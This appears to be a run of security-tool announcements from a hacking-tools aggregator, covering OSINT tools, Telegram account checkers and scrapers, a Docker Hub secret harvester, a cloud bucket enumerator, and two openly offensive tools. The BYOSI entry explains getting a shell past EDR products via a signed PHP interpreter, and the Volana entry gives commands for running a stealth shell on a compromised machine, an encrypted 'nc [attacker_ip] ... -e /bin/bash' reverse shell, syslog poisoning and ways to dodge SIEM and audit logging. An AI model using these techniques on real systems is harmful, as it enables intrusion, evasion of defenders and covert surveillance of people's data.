    • Export capabilities

    πŸ‘₯ Contributing

    We welcome contributions! To contribute to PANO:

    1. Fork the repository at https://github.com/ALW1EZ/PANO/
    2. Make your changes in your fork
    3. Test your changes thoroughly
    4. Create a Pull Request to our main branch
    5. In your PR description, include:
    6. What the changes do
    7. Why you made these changes
    8. Any testing you've done
    9. Screenshots if applicable

    Note: We use a single main branch for development. All pull requests should be made directly to main.

    πŸ“– Development Guide

    Click to expand development documentation ### System Requirements - Operating System: Windows or Linux - Python 3.11+ - PySide6 for GUI - Internet connection for online features ### Custom Entities Entities are the core data structures in PANO. Each entity represents a piece of information with specific properties and behaviors. To create a custom entity: 1. Create a new file in the `entities` folder (e.g., `entities/phone_number.py`) 2. Implement your entity class:
    from dataclasses import dataclass
    from typing import ClassVar, Dict, Any
    from .base import Entity

    @dataclass
    class PhoneNumber(Entity):
    name: ClassVar[str] = "Phone Number"
    description: ClassVar[str] = "A phone number entity with country code and validation"

    def init_properties(self):
    """Initialize phone number properties"""
    self.setup_properties({
    "number": str,
    "country_code": str,
    "carrier": str,
    "type": str, # mobile, landline, etc.
    "verified": bool
    })

    def update_label(self):
    """Update the display label"""
    self.label = self.format_label(["country_code", "number"])
    ### Custom Transforms Transforms are operations that process entities and generate new insights or relationships. To create a custom transform: 1. Create a new file in the `transforms` folder (e.g., `transforms/phone_lookup.py`) 2. Implement your transform class:
    from dataclasses import dataclass
    from typing import ClassVar, List
    from .base import Transform
    from entities.base import Entity
    from entities.phone_number import PhoneNumber
    from entities.location import Location
    from ui.managers.status_manager import StatusManager

    @dataclass
    class PhoneLookup(Transform):
    name: ClassVar[str] = "Phone Number Lookup"
    description: ClassVar[str] = "Lookup phone number details and location"
    input_types: ClassVar[List[str]] = ["PhoneNumber"]
    output_types: ClassVar[List[str]] = ["Location"]

    async def run(self, entity: PhoneNumber, graph) -> List[Entity]:
    if not isinstance(entity, PhoneNumber):
    return []

    status = StatusManager.get()
    operation_id = status.start_loading("Phone Lookup")

    try:
    # Your phone number lookup logic here
    # Example: query an API for phone number details
    location = Location(properties={
    "country": "Example Country",
    "region": "Example Region",
    "carrier": "Example Carrier",
    "source": "PhoneLookup transform"
    })

    return [location]

    except Exception as e:
    status.set_text(f"Error during phone lookup: {str(e)}")
    return []

    finally:
    status.stop_loading(operation_id)
    ### Custom Helpers Helpers are specialized tools that provide additional investigation capabilities through a dedicated UI interface. To create a custom helper: 1. Create a new file in the `helpers` folder (e.g., `helpers/data_analyzer.py`) 2. Implement your helper class:
    from PySide6.QtWidgets import (
    QWidget, QVBoxLayout, QHBoxLayout, QPushButton,
    QTextEdit, QLabel, QComboBox
    )
    from .base import BaseHelper
    from qasync import asyncSlot

    class DummyHelper(BaseHelper):
    """A dummy helper for testing"""

    name = "Dummy Helper"
    description = "A dummy helper for testing"

    def setup_ui(self):
    """Initialize the helper's user interface"""
    # Create input text area
    self.input_label = QLabel("Input:")
    self.input_text = QTextEdit()
    self.input_text.setPlaceholderText("Enter text to process...")
    self.input_text.setMinimumHeight(100)

    # Create operation selector
    operation_layout = QHBoxLayout()
    self.operation_label = QLabel("Operation:")
    self.operation_combo = QComboBox()
    self.operation_combo.addItems(["Uppercase", "Lowercase", "Title Case"])
    operation_layout.addWidget(self.operation_label)
    operation_layout.addWidget(self.operation_combo)

    # Create process button
    self.process_btn = QPushButton("Process")
    self.process_btn.clicked.connect(self.process_text)

    # Create output text area
    self.output_label = QLabel("Output:")
    self.output_text = QTextEdit()
    self.output_text.setReadOnly(True)
    self.output_text.setMinimumHeight(100)

    # Add widgets to main layout
    self.main_layout.addWidget(self.input_label)
    self.main_layout.addWidget(self.input_text)
    self.main_layout.addLayout(operation_layout)
    self.main_layout.addWidget(self.process_btn)
    self.main_layout.addWidget(self.output_label)
    self.main_layout.addWidget(self.output_text)

    # Set dialog size
    self.resize(400, 500)

    @asyncSlot()
    async def process_text(self):
    """Process the input text based on selected operation"""
    text = self.input_text.toPlainText()
    operation = self.operation_combo.currentText()

    if operation == "Uppercase":
    result = text.upper()
    elif operation == "Lowercase":
    result = text.lower()
    else: # Title Case
    result = text.title()

    self.output_text.setPlainText(result)

    πŸ“„ License

    This project is licensed under the Creative Commons Attribution-NonCommercial (CC BY-NC) License.

    You are free to: - βœ… Share: Copy and redistribute the material - βœ… Adapt: Remix, transform, and build upon the material

    Under these terms: - ℹ️ Attribution: You must give appropriate credit - 🚫 NonCommercial: No commercial use - πŸ”“ No additional restrictions

    πŸ™ Acknowledgments

    Special thanks to all library authors and contributors who made this project possible.

    πŸ‘¨β€πŸ’» Author

    Created by ALW1EZ with AI ❀️



    Telegram-Checker - A Python Tool For Checking Telegram Accounts Via Phone Numbers Or Usernames

    By: Unknown


    Enhanced version of bellingcat's Telegram Phone Checker!

    A Python script to check Telegram accounts using phone numbers or username.


    ✨ Features

    • πŸ” Check single or multiple phone numbers and usernames
    • πŸ“ Import numbers from text file
    • πŸ“Έ Auto-download profile pictures
    • πŸ’Ύ Save results as JSON
    • πŸ” Secure credential storage
    • πŸ“Š Detailed user information

    πŸš€ Installation

    1. Clone the repository:
    git clone https://github.com/unnohwn/telegram-checker.git
    cd telegram-checker
    1. Install required packages:
    pip install -r requirements.txt

    πŸ“¦ Requirements

    Contents of requirements.txt:

    telethon
    rich
    click
    python-dotenv

    Or install packages individually:

    pip install telethon rich click python-dotenv

    βš™οΈ Configuration

    First time running the script, you'll need: - Telegram API credentials (get from https://my.telegram.org/apps) - Your Telegram phone number including countrycode + - Verification code (sent to your Telegram)

    πŸ’» Usage

    Run the script:

    python telegram_checker.py

    Choose from options: 1. Check phone numbers from input 2. Check phone numbers from file 3. Check usernames from input 4. Check usernames from file 5. Clear saved credentials 6. Exit

    πŸ“‚ Output

    Results are saved in: - results/ - JSON files with detailed information - profile_photos/ - Downloaded profile pictures

    ⚠️ Note

    This tool is for educational purposes only. Please respect Telegram's terms of service and user privacy.

    πŸ“„ License

    MIT License



    Telegram-Scraper - A Powerful Python Script That Allows You To Scrape Messages And Media From Telegram Channels Using The Telethon Library

    By: Unknown


    A powerful Python script that allows you to scrape messages and media from Telegram channels using the Telethon library. Features include real-time continuous scraping, media downloading, and data export capabilities.

    ___________________  _________
    \__ ___/ _____/ / _____/
    | | / \ ___ \_____ \
    | | \ \_\ \/ \
    |____| \______ /_______ /
    \/ \/

    Features πŸš€

    • Scrape messages from multiple Telegram channels
    • Download media files (photos, documents)
    • Real-time continuous scraping
    • Export data to JSON and CSV formats
    • SQLite database storage
    • Resume capability (saves progress)
    • Media reprocessing for failed downloads
    • Progress tracking
    • Interactive menu interface

    Prerequisites πŸ“‹

    Before running the script, you'll need:

    • Python 3.7 or higher
    • Telegram account
    • API credentials from Telegram

    Required Python packages

    pip install -r requirements.txt

    Contents of requirements.txt:

    telethon
    aiohttp
    asyncio

    Getting Telegram API Credentials πŸ”‘

    1. Visit https://my.telegram.org/auth
    2. Log in with your phone number
    3. Click on "API development tools"
    4. Fill in the form:
    5. App title: Your app name
    6. Short name: Your app short name
    7. Platform: Can be left as "Desktop"
    8. Description: Brief description of your app
    9. Click "Create application"
    10. You'll receive:
    11. api_id: A number
    12. api_hash: A string of letters and numbers

    Keep these credentials safe, you'll need them to run the script!

    Setup and Running πŸ”§

    1. Clone the repository:
    git clone https://github.com/unnohwn/telegram-scraper.git
    cd telegram-scraper
    1. Install requirements:
    pip install -r requirements.txt
    1. Run the script:
    python telegram-scraper.py
    1. On first run, you'll be prompted to enter:
    2. Your API ID
    3. Your API Hash
    4. Your phone number (with country code)
    5. Your phone number (with country code) or bot, but use the phone number option when prompted second time.
    6. Verification code (sent to your Telegram)

    Initial Scraping Behavior πŸ•’

    When scraping a channel for the first time, please note:

    • The script will attempt to retrieve the entire channel history, starting from the oldest messages
    • Initial scraping can take several minutes or even hours, depending on:
    • The total number of messages in the channel
    • Whether media downloading is enabled
    • The size and number of media files
    • Your internet connection speed
    • Telegram's rate limiting
    • The script uses pagination and maintains state, so if interrupted, it can resume from where it left off
    • Progress percentage is displayed in real-time to track the scraping status
    • Messages are stored in the database as they are scraped, so you can start analyzing available data even before the scraping is complete

    Usage πŸ“

    The script provides an interactive menu with the following options:

    • [A] Add new channel
    • Enter the channel ID or channelname
    • [R] Remove channel
    • Remove a channel from scraping list
    • [S] Scrape all channels
    • One-time scraping of all configured channels
    • [M] Toggle media scraping
    • Enable/disable downloading of media files
    • [C] Continuous scraping
    • Real-time monitoring of channels for new messages
    • [E] Export data
    • Export to JSON and CSV formats
    • [V] View saved channels
    • List all saved channels
    • [L] List account channels
    • List all channels with ID:s for account
    • [Q] Quit

    Channel IDs πŸ“’

    You can use either: - Channel username (e.g., channelname) - Channel ID (e.g., -1001234567890)

    Data Storage πŸ’Ύ

    Database Structure

    Data is stored in SQLite databases, one per channel: - Location: ./channelname/channelname.db - Table: messages - id: Primary key - message_id: Telegram message ID - date: Message timestamp - sender_id: Sender's Telegram ID - first_name: Sender's first name - last_name: Sender's last name - username: Sender's username - message: Message text - media_type: Type of media (if any) - media_path: Local path to downloaded media - reply_to: ID of replied message (if any)

    Media Storage πŸ“

    Media files are stored in: - Location: ./channelname/media/ - Files are named using message ID or original filename

    Exported Data πŸ“Š

    Data can be exported in two formats: 1. CSV: ./channelname/channelname.csv - Human-readable spreadsheet format - Easy to import into Excel/Google Sheets

    1. JSON: ./channelname/channelname.json
    2. Structured data format
    3. Ideal for programmatic processing

    Features in Detail πŸ”

    Continuous Scraping

    The continuous scraping feature ([C] option) allows you to: - Monitor channels in real-time - Automatically download new messages - Download media as it's posted - Run indefinitely until interrupted (Ctrl+C) - Maintains state between runs

    Media Handling

    The script can download: - Photos - Documents - Other media types supported by Telegram - Automatically retries failed downloads - Skips existing files to avoid duplicates

    Error Handling πŸ› οΈ

    The script includes: - Automatic retry mechanism for failed media downloads - State preservation in case of interruption - Flood control compliance - Error logging for failed operations

    Limitations ⚠️

    • Respects Telegram's rate limits
    • Can only access public channels or channels you're a member of
    • Media download size limits apply as per Telegram's restrictions

    Contributing 🀝

    Contributions are welcome! Please feel free to submit a Pull Request.

    License πŸ“„

    This project is licensed under the MIT License - see the LICENSE file for details.

    Disclaimer βš–οΈ

    This tool is for educational purposes only. Make sure to: - Respect Telegram's Terms of Service - Obtain necessary permissions before scraping - Use responsibly and ethically - Comply with data protection regulations



    Telegram-Story-Scraper - A Python Script That Allows You To Automatically Scrape And Download Stories From Your Telegram Friends

    By: Unknown


    A Python script that allows you to automatically scrape and download stories from your Telegram friends using the Telethon library. The script continuously monitors and saves both photos and videos from stories, along with their metadata.


    Important Note About Story Access ⚠️

    Due to Telegram API restrictions, this script can only access stories from: - Users you have added to your friend list - Users whose privacy settings allow you to view their stories

    This is a limitation of Telegram's API and cannot be bypassed.

    Features πŸš€

    • Automatically scrapes all available stories from your Telegram friends
    • Downloads both photos and videos from stories
    • Stores metadata in SQLite database
    • Exports data to Excel spreadsheet
    • Real-time monitoring with customizable intervals
    • Timestamp is set to (UTC+2)
    • Maintains record of previously downloaded stories
    • Resume capability
    • Automatic retry mechanism

    Prerequisites πŸ“‹

    Before running the script, you'll need:

    • Python 3.7 or higher
    • Telegram account
    • API credentials from Telegram
    • Friends on Telegram whose stories you want to track

    Required Python packages

    pip install -r requirements.txt

    Contents of requirements.txt:

    telethon
    openpyxl
    schedule

    Getting Telegram API Credentials πŸ”‘

    1. Visit https://my.telegram.org/auth
    2. Log in with your phone number
    3. Click on "API development tools"
    4. Fill in the form:
    5. App title: Your app name
    6. Short name: Your app short name
    7. Platform: Can be left as "Desktop"
    8. Description: Brief description of your app
    9. Click "Create application"
    10. You'll receive:
    11. api_id: A number
    12. api_hash: A string of letters and numbers

    Keep these credentials safe, you'll need them to run the script!

    Setup and Running πŸ”§

    1. Clone the repository:
    git clone https://github.com/unnohwn/telegram-story-scraper.git
    cd telegram-story-scraper
    1. Install requirements:
    pip install -r requirements.txt
    1. Run the script:
    python TGSS.py
    1. On first run, you'll be prompted to enter:
    2. Your API ID
    3. Your API Hash
    4. Your phone number (with country code)
    5. Verification code (sent to your Telegram)
    6. Checking interval in seconds (default is 60)

    How It Works πŸ”„

    The script: 1. Connects to your Telegram account 2. Periodically checks for new stories from your friends 3. Downloads any new stories (photos/videos) 4. Stores metadata in a SQLite database 5. Exports information to an Excel file 6. Runs continuously until interrupted (Ctrl+C)

    Data Storage πŸ’Ύ

    Database Structure (stories.db)

    SQLite database containing: - user_id: Telegram user ID of the story creator - story_id: Unique story identifier - timestamp: When the story was posted (UTC+2) - filename: Local filename of the downloaded media

    CSV and Excel Export (stories_export.csv/xlsx)

    Export file containing the same information as the database, useful for: - Easy viewing of story metadata - Filtering and sorting - Data analysis - Sharing data with others

    Media Storage πŸ“

    • Photos are saved as: {user_id}_{story_id}.jpg
    • Videos are saved with their original extension: {user_id}_{story_id}.{extension}
    • All media files are saved in the script's directory

    Features in Detail πŸ”

    Continuous Monitoring

    • Customizable checking interval (default: 60 seconds)
    • Runs continuously until manually stopped
    • Maintains state between runs
    • Avoids duplicate downloads

    Media Handling

    • Supports both photos and videos
    • Automatically detects media type
    • Preserves original quality
    • Generates unique filenames

    Error Handling πŸ› οΈ

    The script includes: - Automatic retry mechanism for failed downloads - Error logging for failed operations - Connection error handling - State preservation in case of interruption

    Limitations ⚠️

    • Subject to Telegram's rate limits
    • Stories must be currently active (not expired)
    • Media download size limits apply as per Telegram's restrictions

    Contributing 🀝

    Contributions are welcome! Please feel free to submit a Pull Request.

    License πŸ“„

    This project is licensed under the MIT License - see the LICENSE file for details.

    Disclaimer βš–οΈ

    This tool is for educational purposes only. Make sure to: - Respect Telegram's Terms of Service - Obtain necessary permissions before scraping - Use responsibly and ethically - Comply with data protection regulations - Respect user privacy



    gitGRAB - This Tool Is Designed To Interact With The GitHub API And Retrieve Specific User Details, Repository Information, And Commit Emails For A Given User

    By: Unknown


    This tool is designed to interact with the GitHub API and retrieve specific user details, repository information, and commit emails for a given user.


    Install Requests

    pip install requests

    Execute the program

    python3 gitgrab.py



    Snoop - OSINT Tool For Research Social Media Accounts By Username

    By: Unknown


    OSINT Tool for research social media accounts by username


    Install Requests

    ```Install Requests pip install requests

    #### Install BeautifulSoup
    ```Install BeautifulSoup
    pip install beautifulsoup4

    Execute the program

    Execute Snoop python3 snoop.py



    BYOSI - Evade EDR's The Simple Way, By Not Touching Any Of The API's They Hook

    By: Unknown


    Evade EDR's the simple way, by not touching any of the API's they hook.

    Theory

    I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit.

    Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible.

    Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering any EDR detections. EDRs typically overlook script files, focusing instead on binaries for implant delivery. They're configured to detect high entropy or suspicious sections in binaries, not simple scripts.

    This attack method capitalizes on that oversight for significant profit. The PowerShell script's steps mirror what a developer might do when first entering an environment. Remarkably, just four lines of PowerShell code completely evade EDR detection, with Defender/AMSI also blind to it. Adding to the effectiveness, GitHub serves as a trusted deployer.


    What this script does

    The PowerShell script achieves EDR/AV evasion through four simple steps (technically 3):

    1.) It fetches the PHP archive for Windows and extracts it into a new directory named 'php' within 'C:\Temp'.
    2.) The script then proceeds to acquire the implant PHP script or shell, saving it in the same 'C:\Temp\php' directory.
    3.) Following this, it executes the implant or shell, utilizing the whitelisted PHP binary (which exempts the binary from most restrictions in place that would prevent the binary from running to begin with.)

    With these actions completed, congratulations: you now have an active shell on a Crowdstrike-monitored system. What's particularly amusing is that, if my memory serves me correctly, Sentinel One is unable to scan PHP file types. So, feel free to let your imagination run wild.

    Disclaimer.

    I am in no way responsible for the misuse of this. This issue is a major blind spot in EDR protection, i am only bringing it to everyones attention.

    Thanks Section

    A big thanks to @im4x5yn74x for affectionately giving it the name BYOSI, and helping with the env to test in bringing this attack method to life.

    Edit

    It appears as though MS Defender is now flagging the PHP script as malicious, but still fully allowing the Powershell script full execution. so, modify the PHP script.

    Edit

    hello sentinel one :) might want to make sure that you are making links not embed.



    DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More

    By: Unknown


    DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.


    What is Docker?

    Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.

    About Docker Hub

    Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.

    Why OSINT on Docker Hub?

    Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:

    1. Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.

    2. Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.

    3. Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.

    4. Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.

    5. Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.

    Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.

    How DockerSpy Works

    DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.

    Getting Started

    To use DockerSpy, follow these steps:

    1. Installation: Clone the DockerSpy repository and install the required dependencies.
    git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
    1. Usage: Run DockerSpy from terminal.
    dockerspy

    Custom Configurations

    To customize DockerSpy configurations, edit the following files: - Regular Expressions - Ignored File Extensions

    Disclaimer

    DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.

    Contribution

    Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.

    About the Author

    DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)

    I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.

    Consider following me:

    DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (2) DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (3) DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (4)


    Thanks

    Special thanks to @akaclandestine



    CloudBrute - Awesome Cloud Enumerator

    By: Unknown


    A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

    The complete writeup is available. here


    Motivation

    we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
    Here is the list issues on previous approaches we tried to fix:

    • separated wordlists
    • lack of proper concurrency
    • lack of supporting all major cloud providers
    • require authentication or keys or cloud CLI access
    • outdated endpoints and regions
    • Incorrect file storage detection
    • lack support for proxies (useful for bypassing region restrictions)
    • lack support for user agent randomization (useful for bypassing rare restrictions)
    • hard to use, poorly configured

    Features

    • Cloud detection (IPINFO API and Source Code)
    • Supports all major providers
    • Black-Box (unauthenticated)
    • Fast (concurrent)
    • Modular and easily customizable
    • Cross Platform (windows, linux, mac)
    • User-Agent Randomization
    • Proxy Randomization (HTTP, Socks5)

    Supported Cloud Providers

    Microsoft: - Storage - Apps

    Amazon: - Storage - Apps

    Google: - Storage - Apps

    DigitalOcean: - storage

    Vultr: - Storage

    Linode: - Storage

    Alibaba: - Storage

    Version

    1.0.0

    Usage

    Just download the latest release for your operation system and follow the usage.

    To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.

    It looks like this

    providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
    environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
    proxytype: "http" # socks5 / http
    ipinfo: "" # IPINFO.io API KEY

    For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.

    We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.

    After setting up your API key, you are ready to use CloudBrute.

     β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•
    β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•
    β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
    β•šβ•β•β•β•β•β•β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•β•β•β•β•
    V 1.0.7
    usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
    -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
    <integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
    [-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
    [-m|--mode "<value>"] [-o|--output "<value>"]
    [-C|--configFolder "<value>"]

    Awesome Cloud Enumerator

    Arguments:

    -h --help Print help information
    -d --domain domain
    -k --keyword keyword used to generator urls
    -w --wordlist path to wordlist
    -c --cloud force a search, check config.yaml providers list
    -t --threads number of threads. Default: 80
    -T --timeout timeout per request in seconds. Default: 10
    -p --proxy use proxy list
    -a --randomagent user agent randomization
    -D --debug show debug logs. Default: false
    -q --quite suppress all output. Default: false
    -m --mode storage or app. Default: storage
    -o --output Output file. Default: out.txt
    -C --configFolder Config path. Default: config


    for example

    CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

    please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments

    If a cloud provider not detected or want force searching on a specific provider, you can use -c option.

    CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

    Dev

    • Clone the repo
    • go build -o CloudBrute main.go
    • go test internal

    in action

    How to contribute

    • Add a module or fix something and then pull request.
    • Share it with whomever you believe can use it.
    • Do the extra work and share your findings with community β™₯

    FAQ

    How to make the best out of this tool?

    Read the usage.

    I get errors; what should I do?

    Make sure you read the usage correctly, and if you think you found a bug open an issue.

    When I use proxies, I get too many errors, or it's too slow?

    It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.

    too fast or too slow ?

    change -T (timeout) option to get best results for your run.

    Credits

    Inspired by every single repo listed here .



    Volana - Shell Command Obfuscation To Avoid Detection Systems

    By: Unknown


    Shell command obfuscation to avoid SIEM/detection system

    During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.

    volana provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage


    Usage

    You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed

    ## Download it from github release
    ## If you do not have internet access from compromised machine, find another way
    curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

    ## Execute it
    ./volana

    ## You are now under the radar
    volana Β» echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
    volana Β» [command]

    Keyword for volana console: * ring: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call) * exit: exit volana console

    from non interactive shell

    Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt and decrypt subcommand. Previously, you need to build volana with embedded encryption key.

    On attacker machine

    ## Build volana with encryption key
    make build.volana-with-encryption

    ## Transfer it on TARGET (the unique detectable command)
    ## [...]

    ## Encrypt the command you want to stealthy execute
    ## (Here a nc bindshell to obtain a interactive shell)
    volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
    >>> ENCRYPTED COMMAND

    Copy encrypted command and executed it with your rce on target machine

    ./volana decr [encrypted_command]
    ## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

    Why not just hide command with echo [command] | base64 ? And decode on target with echo [encoded_command] | base64 -d | bash

    Because we want to be protected against systems that trigger alert for base64 use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.

    Detection

    Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

    By detected we mean if we are able to trigger an alert if a certain command has been executed.

    Hide from

    Only the volana launching command line will be catched. 🧠 However, by adding a space before executing it, the default bash behavior is to not save it

    • Detection systems that are based on history command output
    • Detection systems that are based on history files
    • .bash_history, ".zsh_history" etc ..
    • Detection systems that are based on bash debug traps
    • Detection systems that are based on sudo built-in logging system
    • Detection systems tracing all processes syscall system-wide (eg opensnoop)
    • Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
    • Easy to detect & avoid: pkill -9 script
    • Not a common case
    • screen is a bit more difficult to avoid, however it does not register input (secret input: stty -echo => avoid)
    • Command detection Could be avoid with volana with encryption

    Visible for

    • Detection systems that have alert for unknown command (volana one)
    • Detection systems that are based on keylogger
    • Easy to avoid: copy/past commands
    • Not a common case
    • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
    • Only for sudo or su commands
    • syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
    • Detection systems that are based on syscall (eg auditd,LKML/eBPF)
    • Difficult to analyze, could be make unreadable by making several diversion syscalls
    • Custom LD_PRELOAD injection to make log
    • Not a common case at all

    Bug bounty

    Sorry for the clickbait title, but no money will be provided for contibutors. πŸ›

